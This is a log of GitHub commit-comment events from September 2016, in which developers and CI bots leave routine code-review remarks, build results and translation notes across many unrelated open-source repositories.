{"id":"4602936128","type":"CommitCommentEvent","actor":{"login":"W4lly63"},"repo":{"name":"W4lly63/HEARTHQUAKE-MISSION-MOD"},"payload":{"comment":{"id":19131472,"position":null,"line":null,"path":null,"commit_id":"21dea7b10cba7763aa7a1e6d4af8128cb80c81bc","created_at":"2016-09-22T14:48:05Z","updated_at":"2016-09-22T14:48:05Z","body":"classname updated"}},"created_at":"2016-09-22T14:48:05Z"}
{"id":"4602937542","type":"CommitCommentEvent","actor":{"login":"foragerr"},"repo":{"name":"CheyneWilson/jmeter-gradle-plugin"},"payload":{"comment":{"id":19131474,"position":null,"line":null,"path":null,"commit_id":"369fe329cc124248d32e05add6cf91d20b84e1de","created_at":"2016-09-22T14:48:17Z","updated_at":"2016-09-22T14:48:17Z","body":"I like the direction you're going in. Remote injectors and plugin tests were on my TODO list. I didn't think about multiple test configs, but it is a great idea.\r\n\r\nHow do you plan to kill remote injectors from Ctrl+C? "}},"created_at":"2016-09-22T14:48:17Z"}
{"id":"4602939771","type":"CommitCommentEvent","actor":{"login":"sylvainbx"},"repo":{"name":"LaCasemate/fab-manager"},"payload":{"comment":{"id":19131479,"position":null,"line":null,"path":null,"commit_id":"6401b321ef9672d97c2da42be47d361794b12d47","created_at":"2016-09-22T14:48:37Z","updated_at":"2016-09-22T14:48:37Z","body":"This resolves issue #43 "}},"created_at":"2016-09-22T14:48:37Z"}
{"id":"4602942540","type":"CommitCommentEvent","actor":{"login":"gialloporpora"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19131483,"position":106,"line":87,"path":"it/firefox/channel/index.lang","commit_id":"e88d1d139596e8e9d94063b42f588bfc2bfbceb0","created_at":"2016-09-22T14:49:01Z","updated_at":"2016-09-22T14:49:01Z","body":"Io qui il gioco di parole ci avevo proprio rinunciato a mantenerlo, però forse, cambiando da alba a notte, si potrebbe usare Aurora al posto di nightly per rendere il senso dell'originale.\r\nProva funzioni completamente nuove dalle prime luci dell'aurora al tramonto.\r\nPerò non è che sia un granché\r\n"}},"created_at":"2016-09-22T14:49:01Z"}
{"id":"4602943622","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19131487,"position":null,"line":null,"path":null,"commit_id":"83800f3c8407b4567361598551c107ec24043279","created_at":"2016-09-22T14:49:11Z","updated_at":"2016-09-22T14:49:11Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - i386-Windows-7-VisualStudio-12: Tests Failed (1766 of 2339 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-83800f3c8407b4567361598551c107ec24043279-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-83800f3c8407b4567361598551c107ec24043279-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-75.5%25-red.svg)</a> \n"}},"created_at":"2016-09-22T14:49:11Z"}
{"id":"4602947336","type":"CommitCommentEvent","actor":{"login":"foragerr"},"repo":{"name":"CheyneWilson/jmeter-gradle-plugin"},"payload":{"comment":{"id":19131496,"position":null,"line":null,"path":null,"commit_id":"ff42705d976939193d249a275dc1a0a6d53c7d6d","created_at":"2016-09-22T14:49:44Z","updated_at":"2016-09-22T14:49:44Z","body":"heads up: I'm doing a major refactor of jmReport to use Jmeter3.0's dashboard instead of the current report templates. "}},"created_at":"2016-09-22T14:49:44Z"}
{"id":"4602951369","type":"CommitCommentEvent","actor":{"login":"maurofmferrao"},"repo":{"name":"maurofmferrao/xibo-cms"},"payload":{"comment":{"id":19131503,"position":null,"line":null,"path":null,"commit_id":"ed9dcbe476099c7dc17f117f4bd5707a4537c41a","created_at":"2016-09-22T14:50:20Z","updated_at":"2016-09-22T14:50:20Z","body":"- Added new 1920*1080 template with background\r\n\r\n- Scaling according to the widget original size feature\r\n\r\n- Backgrounds for the template added\r\n\r\n- Thumbnail for the templates selection moved to a new folder so wont be copied to the players\r\n "}},"created_at":"2016-09-22T14:50:20Z"}
{"id":"4602952133","type":"CommitCommentEvent","actor":{"login":"TedGoas"},"repo":{"name":"TedGoas/Cerberus"},"payload":{"comment":{"id":19131508,"position":88,"line":184,"path":"cerberus-hybrid.html","commit_id":"95ab4cfa9d5daa4e0b749520ffa4f878d2a12b95","created_at":"2016-09-22T14:50:26Z","updated_at":"2016-09-22T14:50:26Z","body":"@volodymyrpekh I added font attributes so alt-text is styled when images aren't displayed. I initially added height attributes for images so the layout wouldn't jump as images downloaded, but this caused a bug in some mobile clients so [I undid that](https://github.com/TedGoas/Cerberus/issues/75)."}},"created_at":"2016-09-22T14:50:26Z"}
{"id":"4602952509","type":"CommitCommentEvent","actor":{"login":"gialloporpora"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19131509,"position":56,"line":47,"path":"it/firefox/channel/index.lang","commit_id":"e88d1d139596e8e9d94063b42f588bfc2bfbceb0","created_at":"2016-09-22T14:50:29Z","updated_at":"2016-09-22T14:50:29Z","body":"Qui non ho cambiato build con versioni, teniamo build vero?\r\n"}},"created_at":"2016-09-22T14:50:29Z"}
{"id":"4602958210","type":"CommitCommentEvent","actor":{"login":"93Gunit"},"repo":{"name":"93Gunit/git_training"},"payload":{"comment":{"id":19131528,"position":2,"line":1,"path":"응용프로그래밍/hw.cpp","commit_id":"79e0420e60250cddf40998ebd9542e33204d96bc","created_at":"2016-09-22T14:51:20Z","updated_at":"2016-09-22T14:51:20Z","body":"화이팅!"}},"created_at":"2016-09-22T14:51:20Z"}
{"id":"4602963453","type":"CommitCommentEvent","actor":{"login":"chrisma"},"repo":{"name":"hpi-swt2/wimi-portal"},"payload":{"comment":{"id":19131541,"position":null,"line":null,"path":null,"commit_id":"eb4ca622607091929aba300f299c7894e74263dc","created_at":"2016-09-22T14:52:09Z","updated_at":"2016-09-22T14:52:09Z","body":"HTML5 to the rescue (instead of using Javascript)!\r\n```\r\n<form id=\"myform\" method=\"get\" action=\"something.php\">\r\n    <input type=\"text\" name=\"name\" />\r\n</form>\r\n\r\n<input type=\"submit\" form=\"myform\" **/>**\r\n```"}},"created_at":"2016-09-22T14:52:09Z"}
{"id":"4602967533","type":"CommitCommentEvent","actor":{"login":"mewmew"},"repo":{"name":"llir/llvm"},"payload":{"comment":{"id":19131549,"position":null,"line":null,"path":null,"commit_id":"b0e89e39f7c141218e388ac302d040b0dc727ca1","created_at":"2016-09-22T14:52:44Z","updated_at":"2016-09-22T14:52:44Z","body":"> I do believe that the logger should have lshortname flag instead of date and time though.\r\n\r\nFeel free to add it. I also think this makes debugging easier."}},"created_at":"2016-09-22T14:52:44Z"}
{"id":"4602968243","type":"CommitCommentEvent","actor":{"login":"RonnyPfannschmidt"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19131550,"position":5,"line":15,"path":"nixos/modules/virtualisation/containers.nix","commit_id":"b9df84cd4f6b70bdfa395a91dbf3d712adc7e18d","created_at":"2016-09-22T14:52:50Z","updated_at":"2016-09-22T14:52:50Z","body":"why does optionalstring need a null check? cant it use the null value as indicator?"}},"created_at":"2016-09-22T14:52:50Z"}
{"id":"4602971081","type":"CommitCommentEvent","actor":{"login":"paytonrules"},"repo":{"name":"hnlee/httpserver"},"payload":{"comment":{"id":19131559,"position":18,"line":37,"path":"src/httpserver/operator.clj","commit_id":"fe1b303fa825d859ff9c5a71d771948559ae78ea","created_at":"2016-09-22T14:53:15Z","updated_at":"2016-09-22T14:53:15Z","body":"Okay now that I understand what this conditional does - it should probably be a function in the router namespace. Something like (router/valid-route? method decoded-uri)"}},"created_at":"2016-09-22T14:53:15Z"}
{"id":"4602971816","type":"CommitCommentEvent","actor":{"login":"sompylasar"},"repo":{"name":"mzhurovich/Current"},"payload":{"comment":{"id":19131560,"position":77,"line":96,"path":"Karl/integrations/nodejs/claire.js","commit_id":"1e136f702c1e0134b328dcbff65c310011eedece","created_at":"2016-09-22T14:53:22Z","updated_at":"2016-09-22T14:53:22Z","body":"The test for truthiness is enough, no meed to explicitly compare with undefined."}},"created_at":"2016-09-22T14:53:22Z"}
{"id":"4602973602","type":"CommitCommentEvent","actor":{"login":"dasgarner"},"repo":{"name":"maurofmferrao/xibo-cms"},"payload":{"comment":{"id":19131564,"position":4,"line":81,"path":"lib/Widget/ForecastIo.php","commit_id":"ed9dcbe476099c7dc17f117f4bd5707a4537c41a","created_at":"2016-09-22T14:53:39Z","updated_at":"2016-09-22T14:53:39Z","body":"this and the next 3 will be added from the forecastio folder when we loop through that below?"}},"created_at":"2016-09-22T14:53:39Z"}
{"id":"4602973706","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":19131565,"position":null,"line":null,"path":null,"commit_id":"afd7178489f7dbbab59a91c60a63a1b2bfa9b3dc","created_at":"2016-09-22T14:53:39Z","updated_at":"2016-09-22T14:53:39Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#OPDL2zEhSRynzTMQOAk2fg"}},"created_at":"2016-09-22T14:53:39Z"}
{"id":"4602979153","type":"CommitCommentEvent","actor":{"login":"paytonrules"},"repo":{"name":"hnlee/httpserver"},"payload":{"comment":{"id":19131577,"position":5,"line":13,"path":"src/httpserver/operator.clj","commit_id":"7ee66a0fe53e10515811c8821601634f98770ca0","created_at":"2016-09-22T14:54:26Z","updated_at":"2016-09-22T14:54:26Z","body":"You can use `when-let` so you don't need the explicit nil when the query isn't found."}},"created_at":"2016-09-22T14:54:26Z"}
{"id":"4602979169","type":"CommitCommentEvent","actor":{"login":"Steboss"},"repo":{"name":"michellab/Sire"},"payload":{"comment":{"id":19131578,"position":null,"line":null,"path":null,"commit_id":"fcbeb8e38b63a0ad00c8502dd62d1fea8f551275","created_at":"2016-09-22T14:54:26Z","updated_at":"2016-09-22T14:54:26Z","body":"I agree\r\n\r\nwritten in the TODO list \r\nI'll update the code asap \r\n\r\n"}},"created_at":"2016-09-22T14:54:26Z"}
{"id":"4602980401","type":"CommitCommentEvent","actor":{"login":"rrusso"},"repo":{"name":"at-tools/moodle-block_massaction"},"payload":{"comment":{"id":19131583,"position":null,"line":null,"path":null,"commit_id":"8fe845a6897989f68d116406651346cc36dba9f0","created_at":"2016-09-22T14:54:37Z","updated_at":"2016-09-22T14:54:37Z","body":"You broke 3f96c2814be17859a3e8eaf0cd046d9410d67c91 with this commit.\r\n\r\nPlease reinstate js/module_selector.js to its working state."}},"created_at":"2016-09-22T14:54:37Z"}
{"id":"4602985469","type":"CommitCommentEvent","actor":{"login":"duaraghav8"},"repo":{"name":"duaraghav8/solparse"},"payload":{"comment":{"id":19131589,"position":null,"line":null,"path":null,"commit_id":"cda3ff94b6a7579b52ff5e5b91acaef62c86792d","created_at":"2016-09-22T14:55:21Z","updated_at":"2016-09-22T14:55:21Z","body":"solves #8 "}},"created_at":"2016-09-22T14:55:21Z"}
{"id":"4602988756","type":"CommitCommentEvent","actor":{"login":"sangisos"},"repo":{"name":"llir/llvm"},"payload":{"comment":{"id":19131594,"position":null,"line":null,"path":null,"commit_id":"b0e89e39f7c141218e388ac302d040b0dc727ca1","created_at":"2016-09-22T14:55:51Z","updated_at":"2016-09-22T14:55:51Z","body":"But as you could see, I'm not sure where a good place to add it is. It would be nice with a globally available correctly set up logger to use everywhere. Any ideas?"}},"created_at":"2016-09-22T14:55:51Z"}
{"id":"4602988865","type":"CommitCommentEvent","actor":{"login":"bendk"},"repo":{"name":"pculture/unisubs"},"payload":{"comment":{"id":19131595,"position":25,"line":233,"path":"apps/api/views/users.py","commit_id":"27b5c073345db3086ef925500c0913d7d833c9b9","created_at":"2016-09-22T14:55:52Z","updated_at":"2016-09-22T14:55:52Z","body":"Yeah looks like it was reversed before."}},"created_at":"2016-09-22T14:55:52Z"}
{"id":"4602991732","type":"CommitCommentEvent","actor":{"login":"paytonrules"},"repo":{"name":"hnlee/httpserver"},"payload":{"comment":{"id":19131601,"position":6,"line":14,"path":"src/httpserver/operator.clj","commit_id":"7ee66a0fe53e10515811c8821601634f98770ca0","created_at":"2016-09-22T14:56:17Z","updated_at":"2016-09-22T14:56:17Z","body":"I might be alone on this but I've become a huge fan of the threading macros. ->, ->> and as->. \r\n\r\nIn this case you could do:\r\n\r\n```\r\n(-> (query 1)\r\n      (string/replace #\"=\" \" = \")\r\n      (string/replace #\"&\" \"\\r\\n\"))\r\n```"}},"created_at":"2016-09-22T14:56:17Z"}
{"id":"4603001266","type":"CommitCommentEvent","actor":{"login":"luis-pereira"},"repo":{"name":"pvanek/qlipper"},"payload":{"comment":{"id":19131617,"position":null,"line":null,"path":null,"commit_id":"0862db2ecd029cf3482d05f66efab311b3f3725b","created_at":"2016-09-22T14:57:40Z","updated_at":"2016-09-22T14:57:40Z","body":"@palinek Check it [here](https://github.com/lxde/libqtxdg/blob/travis/.travis.yml)"}},"created_at":"2016-09-22T14:57:40Z"}
{"id":"4603001952","type":"CommitCommentEvent","actor":{"login":"ThomasKaiser"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":19131618,"position":null,"line":null,"path":null,"commit_id":"b81058c0029c98cba88970d4240f725739a98dd7","created_at":"2016-09-22T14:57:46Z","updated_at":"2016-09-22T14:57:46Z","body":"Any objections against adding `+CONFIG_SYS_CLK_FREQ=480000000` again to NEO's config?"}},"created_at":"2016-09-22T14:57:46Z"}
{"id":"4603004415","type":"CommitCommentEvent","actor":{"login":"mechamanny"},"repo":{"name":"samanthag21/phase-0-tracks"},"payload":{"comment":{"id":19131624,"position":null,"line":null,"path":null,"commit_id":"aa91da4a89262ba5f9c56812253da0b0dd7085e1","created_at":"2016-09-22T14:58:08Z","updated_at":"2016-09-22T14:58:08Z","body":"Looks good! tag my in a pull request in the future :shipit: "}},"created_at":"2016-09-22T14:58:08Z"}
{"id":"4603004417","type":"CommitCommentEvent","actor":{"login":"sompylasar"},"repo":{"name":"mzhurovich/Current"},"payload":{"comment":{"id":19131625,"position":120,"line":135,"path":"Karl/integrations/nodejs/claire.js","commit_id":"1e136f702c1e0134b328dcbff65c310011eedece","created_at":"2016-09-22T14:58:08Z","updated_at":"2016-09-22T14:58:08Z","body":"`if (typeof statusFiller_ === 'function') {`"}},"created_at":"2016-09-22T14:58:08Z"}
{"id":"4603005425","type":"CommitCommentEvent","actor":{"login":"mewmew"},"repo":{"name":"llir/llvm"},"payload":{"comment":{"id":19131627,"position":null,"line":null,"path":null,"commit_id":"b0e89e39f7c141218e388ac302d040b0dc727ca1","created_at":"2016-09-22T14:58:18Z","updated_at":"2016-09-22T14:58:18Z","body":"> But as you could see, I'm not sure where a good place to add it is. It would be nice with a globally available correctly set up logger to use everywhere. Any ideas?\r\n\r\nJust do like we did in uc.\r\n\r\nFrom https://github.com/mewmew/uc/blob/master/cmd/usem/usem.go#L134\r\n```go\r\n// elog represents a logger with no prefix or flags, which logs errors to\r\n// standard error.\r\nvar elog = log.New(os.Stderr, \"\", 0)\r\n```\r\n\r\nBut adjusted with the correct logging flags."}},"created_at":"2016-09-22T14:58:18Z"}
{"id":"4603008239","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19131633,"position":null,"line":null,"path":null,"commit_id":"842606b3fc7815ff50fb0c6ecb91716f9b5185db","created_at":"2016-09-22T14:58:42Z","updated_at":"2016-09-22T14:58:42Z","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1194 of 1194 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-842606b3fc7815ff50fb0c6ecb91716f9b5185db-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-842606b3fc7815ff50fb0c6ecb91716f9b5185db-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-842606b3fc7815ff50fb0c6ecb91716f9b5185db-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.12%25-green.svg)</a>\n"}},"created_at":"2016-09-22T14:58:42Z"}
{"id":"4603010871","type":"CommitCommentEvent","actor":{"login":"sompylasar"},"repo":{"name":"mzhurovich/Current"},"payload":{"comment":{"id":19131639,"position":10,"line":27,"path":"Karl/integrations/nodejs/claire.js","commit_id":"1e136f702c1e0134b328dcbff65c310011eedece","created_at":"2016-09-22T14:59:05Z","updated_at":"2016-09-22T14:59:05Z","body":"beginMs or beginTimestamp?"}},"created_at":"2016-09-22T14:59:05Z"}
{"id":"4603010957","type":"CommitCommentEvent","actor":{"login":"elpaso"},"repo":{"name":"boundlessgeo/qgis-plugin-template"},"payload":{"comment":{"id":19131640,"position":45,"line":45,"path":"pluginname/tests/testerplugin.py","commit_id":"712640bb86f66b3d7be287863e54e4d8651f0633","created_at":"2016-09-22T14:59:06Z","updated_at":"2016-09-22T14:59:06Z","body":"Can you please add a run_all (or run_tests) function to execute all automated (unit) tests? It will be called from travis"}},"created_at":"2016-09-22T14:59:06Z"}
{"id":"4603011616","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19131642,"position":null,"line":null,"path":null,"commit_id":"58079a2bf3bb511ed2b2506b4b6d339f93381d45","created_at":"2016-09-22T14:59:12Z","updated_at":"2016-09-22T14:59:12Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1122](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13966&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-22T14:59:12Z"}
{"id":"4603013010","type":"CommitCommentEvent","actor":{"login":"stefansaraev"},"repo":{"name":"stefansaraev/TB"},"payload":{"comment":{"id":19131645,"position":null,"line":null,"path":null,"commit_id":"484c422498f021ce0c99a7bb7bdd40495df13e8f","created_at":"2016-09-22T14:59:24Z","updated_at":"2016-09-22T14:59:24Z","body":"@codesnake @sraue @lrusak fyi\r\n\r\nARCH and CROSS_COMPILE should be defined in parent (kernel) Makefile already, so not needed.\r\n"}},"created_at":"2016-09-22T14:59:24Z"}
{"id":"4603014189","type":"CommitCommentEvent","actor":{"login":"mechamanny"},"repo":{"name":"charleslim88/phase-0-tracks"},"payload":{"comment":{"id":19131648,"position":null,"line":null,"path":null,"commit_id":"486c0b6acdd5a3fa554feea5ee2e1d12e97f24e9","created_at":"2016-09-22T14:59:33Z","updated_at":"2016-09-22T14:59:33Z","body":"Nice! Tag me in a PR next time =) :shipit: "}},"created_at":"2016-09-22T14:59:33Z"}
{"id":"4603014340","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19131651,"position":null,"line":null,"path":null,"commit_id":"842606b3fc7815ff50fb0c6ecb91716f9b5185db","created_at":"2016-09-22T14:59:35Z","updated_at":"2016-09-22T14:59:35Z","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-842606b3fc7815ff50fb0c6ecb91716f9b5185db-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-22T14:59:35Z"}
{"id":"4603024888","type":"CommitCommentEvent","actor":{"login":"zador-blood-stained"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":19131671,"position":null,"line":null,"path":null,"commit_id":"b81058c0029c98cba88970d4240f725739a98dd7","created_at":"2016-09-22T15:01:06Z","updated_at":"2016-09-22T15:01:06Z","body":"None.  Looks like I missed this part when I was remaking patches for new u-boot version."}},"created_at":"2016-09-22T15:01:06Z"}
{"id":"4603027406","type":"CommitCommentEvent","actor":{"login":"sompylasar"},"repo":{"name":"mzhurovich/Current"},"payload":{"comment":{"id":19131677,"position":53,"line":85,"path":"Karl/integrations/nodejs/claire.js","commit_id":"1e136f702c1e0134b328dcbff65c310011eedece","created_at":"2016-09-22T15:01:27Z","updated_at":"2016-09-22T15:01:27Z","body":"Public setter of a private property controlled via register/deregister?"}},"created_at":"2016-09-22T15:01:27Z"}
{"id":"4603031370","type":"CommitCommentEvent","actor":{"login":"maniac103"},"repo":{"name":"jruesga/rview"},"payload":{"comment":{"id":19131685,"position":null,"line":null,"path":null,"commit_id":"359614520fc3a8f9afd0db19146f20dce052b91d","created_at":"2016-09-22T15:02:01Z","updated_at":"2016-09-22T15:02:01Z","body":"I pondered that as well, but wasn't sure because of the large ripple circle which can't be assigned a boundary as easily."}},"created_at":"2016-09-22T15:02:01Z"}
{"id":"4603033704","type":"CommitCommentEvent","actor":{"login":"PatrickTrentin88"},"repo":{"name":"LucaGaspa/mzn2omt"},"payload":{"comment":{"id":19131689,"position":12,"line":305,"path":"src/intervalSetLib/number.cpp","commit_id":"af126261eb0cd7b8918f91bee5852381dcc8cba2","created_at":"2016-09-22T15:02:20Z","updated_at":"2016-09-22T15:02:20Z","body":"This can go wrong, floating point division is likely to not returning the original floating point string [see, e.g., https://docs.oracle.com/cd/E19957-01/806-3568/ncg_goldberg.html ]. \r\n\r\nIs the original representation really necessary? where?"}},"created_at":"2016-09-22T15:02:20Z"}
{"id":"4603034263","type":"CommitCommentEvent","actor":{"login":"loriab"},"repo":{"name":"jturney/psi4"},"payload":{"comment":{"id":19131690,"position":5,"line":11,"path":"psi4/src/psi4/CMakeLists.txt","commit_id":"d3df4402c85c4e8b42f26511f5f41587bfef5081","created_at":"2016-09-22T15:02:25Z","updated_at":"2016-09-22T15:02:25Z","body":"why aren't we compiling scf anymore?"}},"created_at":"2016-09-22T15:02:25Z"}
{"id":"4603039220","type":"CommitCommentEvent","actor":{"login":"pyllyukko"},"repo":{"name":"pyllyukko/user.js"},"payload":{"comment":{"id":19131702,"position":null,"line":null,"path":null,"commit_id":"5ec21f74fafca46a09b060bfc44f472f944f9da9","created_at":"2016-09-22T15:03:09Z","updated_at":"2016-09-22T15:03:09Z","body":"Relates to #183"}},"created_at":"2016-09-22T15:03:09Z"}
{"id":"4603041356","type":"CommitCommentEvent","actor":{"login":"dgasmith"},"repo":{"name":"jturney/psi4"},"payload":{"comment":{"id":19131704,"position":5,"line":11,"path":"psi4/src/psi4/CMakeLists.txt","commit_id":"d3df4402c85c4e8b42f26511f5f41587bfef5081","created_at":"2016-09-22T15:03:27Z","updated_at":"2016-09-22T15:03:27Z","body":"SCF was just a wrapper to libscf_solver. Everything was ported python-side and this was no longer needed."}},"created_at":"2016-09-22T15:03:27Z"}
{"id":"4603043271","type":"CommitCommentEvent","actor":{"login":"emankov"},"repo":{"name":"RadeonOpenCompute/hcc"},"payload":{"comment":{"id":19131711,"position":null,"line":null,"path":null,"commit_id":"23b6c99670638b236114395c7d3980f99247aa82","created_at":"2016-09-22T15:03:43Z","updated_at":"2016-09-22T15:03:43Z","body":"[Problem]\r\nClang 4.0 reports an error \"default initialization of an object of const type 'const XXX' without a user-provided default constructor\" on some of const declarations without explicit initialization.\r\n\r\n[Explanation]\r\nAll the problematic declarations are of the objects inherited from POD classes, which are not initialized by default. \r\n[C++ spec](http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2016/n4604.pdf) says: \"If a program calls for the default-initialization of an object of a const-qualified type T, T shall be a class type with user-provided default constructor\" ... 7.1.7.1 The cv-qualifiers ... \"the definition of an object or subobject of const-qualified type must specify an initializer or be subject to default initialization.\"\r\n\r\n[Conclusion]\r\nThe error reported by Clang 4.0 is valid and conforms to C++ spec, because the reported const declarations are ill-formed in fact. Clang 3.5 allows such ill-formed declarations and thus is wrong (Bug in the compiler).\r\n\r\n[Solution]\r\nAdd default empty ctor to the base POD classes in order to make them non-POD. Fix doesn't change tests' logic."}},"created_at":"2016-09-22T15:03:43Z"}
{"id":"4603043498","type":"CommitCommentEvent","actor":{"login":"truonganhhoang"},"repo":{"name":"truonganhhoang/int3117-2016"},"payload":{"comment":{"id":19131713,"position":1,"line":1,"path":"a","commit_id":"8e43c8137f0c57715771e839a90acec1d224d193","created_at":"2016-09-22T15:03:45Z","updated_at":"2016-09-22T15:03:45Z","body":"em xóa file này đi, vì là thừa?"}},"created_at":"2016-09-22T15:03:45Z"}
{"id":"4603044926","type":"CommitCommentEvent","actor":{"login":"zador-blood-stained"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":19131715,"position":null,"line":null,"path":null,"commit_id":"b81058c0029c98cba88970d4240f725739a98dd7","created_at":"2016-09-22T15:03:58Z","updated_at":"2016-09-22T15:03:58Z","body":"But 480MHz is almost *too* low. Maybe make the default a little bit higher, i.e. 648MHz?"}},"created_at":"2016-09-22T15:03:58Z"}
{"id":"4603046981","type":"CommitCommentEvent","actor":{"login":"kayawari"},"repo":{"name":"kayawari/001_design_pattern"},"payload":{"comment":{"id":19131719,"position":null,"line":null,"path":null,"commit_id":"572f0b139eaae3385e67aa6d2d326a93957e4770","created_at":"2016-09-22T15:04:16Z","updated_at":"2016-09-22T15:04:16Z","body":"ll37 ~ 47がfactoryクラスに移ったので、使用者側はスッキリした。\r\n\r\n新しいオブジェクトが増えても、条件分岐や生成処理をfactoryの中に追加すればいいだけ。\r\n**結果、使用者部分は修正が必要なくなる所がメリット！**"}},"created_at":"2016-09-22T15:04:16Z"}
{"id":"4603048037","type":"CommitCommentEvent","actor":{"login":"gforcada"},"repo":{"name":"plone/documentation"},"payload":{"comment":{"id":19131726,"position":392,"line":392,"path":"develop/GET_RID_OF_QI.rst","commit_id":"633cb5214c3ac99eb1d2531f7393d2dbe7185964","created_at":"2016-09-22T15:04:26Z","updated_at":"2016-09-22T15:04:26Z","body":"@mauritsvanrees leftover?"}},"created_at":"2016-09-22T15:04:26Z"}
{"id":"4603051810","type":"CommitCommentEvent","actor":{"login":"sophokles73"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19131732,"position":328,"line":328,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/InMemoryMessageExchangeStore.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-22T15:05:01Z","updated_at":"2016-09-22T15:05:01Z","body":"I can't recall what made me think it wouldn't be necessary. In any case, I will move it into the synchronized block..."}},"created_at":"2016-09-22T15:05:01Z"}
{"id":"4603063735","type":"CommitCommentEvent","actor":{"login":"IncarVishnu"},"repo":{"name":"IncarVishnu/platformer"},"payload":{"comment":{"id":19131749,"position":null,"line":null,"path":null,"commit_id":"d7e3b7affbe296db932b24d92cd4ceef7a588069","created_at":"2016-09-22T15:06:48Z","updated_at":"2016-09-22T15:06:48Z","body":"Hi,\r\n\r\nich dachte mir, das du vielleicht unterschiedliche Tiles konfigurierst, je nach Level. Aber wahrscheinlich hast du Recht, wenn man irgendwo zentral einen Pool an Tiles hat und im Level nur speichert, welche verwendet werden. Wobei es wahrscheinlich auch Sinn macht, wenn du irgendwo einen Pool an Musik hast und im Level einfach nur sagst, welches Stück genau abgespielt werden soll (und wann?)\r\n\r\nVG Daniel"}},"created_at":"2016-09-22T15:06:48Z"}
{"id":"4603067251","type":"CommitCommentEvent","actor":{"login":"DarkMorford"},"repo":{"name":"DarkMorford/scd-bios-disassembly"},"payload":{"comment":{"id":19131758,"position":null,"line":null,"path":null,"commit_id":"4a30f46a559c2c536ab5ac4588465881c5831e4c","created_at":"2016-09-22T15:07:19Z","updated_at":"2016-09-22T15:07:19Z","body":"By the way, would you happen to know a good Z80 simulator/IDE so I can watch what it's doing as opposed to just static analysis?"}},"created_at":"2016-09-22T15:07:19Z"}
{"id":"4603068274","type":"CommitCommentEvent","actor":{"login":"thomasnordquist"},"repo":{"name":"thomasnordquist/shopware"},"payload":{"comment":{"id":19131761,"position":null,"line":null,"path":null,"commit_id":"c00812c8177bd2a8f6b3f12ec81335b79d407bfe","created_at":"2016-09-22T15:07:29Z","updated_at":"2016-09-22T15:07:29Z","body":"Backend will reload like this:\r\n<img width=\"975\" alt=\"backend\" src=\"https://cloud.githubusercontent.com/assets/7721625/18753866/fbbed2be-80e6-11e6-8508-5fbb58b66e71.png\">\r\n"}},"created_at":"2016-09-22T15:07:29Z"}
{"id":"4603070360","type":"CommitCommentEvent","actor":{"login":"mzhurovich"},"repo":{"name":"mzhurovich/Current"},"payload":{"comment":{"id":19131763,"position":53,"line":85,"path":"Karl/integrations/nodejs/claire.js","commit_id":"1e136f702c1e0134b328dcbff65c310011eedece","created_at":"2016-09-22T15:07:48Z","updated_at":"2016-09-22T15:07:48Z","body":"Explain, pls. This method should never be called by user, however I need a way to access private variable from public method."}},"created_at":"2016-09-22T15:07:48Z"}
